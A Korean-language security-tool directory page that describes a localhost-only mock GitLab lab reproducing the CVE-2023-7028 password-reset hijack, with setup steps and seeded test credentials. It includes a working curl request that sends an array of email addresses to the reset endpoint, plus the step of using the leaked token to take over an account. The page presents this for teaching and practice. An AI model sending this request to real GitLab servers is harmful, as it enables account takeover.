Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
GitLab-CVE-2023-7028 — 취약한 GitLab 인스턴스를 모의 재현한 것으로, CVE-2023-7028 비밀번호 재설정 하이재킹을 재현합니다. 배열 기반 이메일 매개변수 악용과 계정 탈취를 시연합니다. 교육용 랩 환경에서만 사용하세요. | Kitploit
도구/GitHubGitHub/feartheploto/gitlab-cve-2023-7028
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubfeartheploto/gitlab-cve-2023-7028

GitLab-CVE-2023-7028

취약한 GitLab 인스턴스를 모의 재현한 것으로, CVE-2023-7028 비밀번호 재설정 하이재킹을 재현합니다. 배열 기반 이메일 매개변수 악용과 계정 탈취를 시연합니다. 교육용 랩 환경에서만 사용하세요.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
16시간 39분 전아직 검토되지 않음
공유

GitLab CVE-2023-7028 — Mock 16.6.0 (호스트 전용)

CVE-2023-7028 (CVSS 10.0): POST /users/password가 user[email][] 배열을 허용 — 서버는 email[0]으로 사용자를 찾았지만 동일한 재설정 토큰을 모든 주소로 전송 → [email protected]을 가진 공격자가 [email protected]을 탈취. 영향: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. 이 mock은 16.6.0 취약 플로우를 재현합니다 (JSON DB, SMTP 없음).

실행

npm install && npm start → http://127.0.0.1:3000 (또는 PORT=3001 npm start; 사용 중이면 자동 재시도; localhost 전용). 시드 데이터: [email protected]/s3cur3P@ss!, [email protected]/BobSecure1!, — 에 저장.

[email protected]/5iveL!fe
data/users.json

재현

curl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]" http://127.0.0.1:3000/mailbox 또는 /api/emails 확인 — 둘 다 동일한 토큰을 받습니다. .../users/password/edit?reset_password_token=TOKEN을 열어 계정을 탈취하세요. 정상 동작: user[email][email protected] → 메일 1건. Mailbox는 모든 메일을 표시하며, 호스트 외부로 전송되지 않습니다. MIT — 실습 전용, 외부에 노출하지 마세요.

도구 다운로드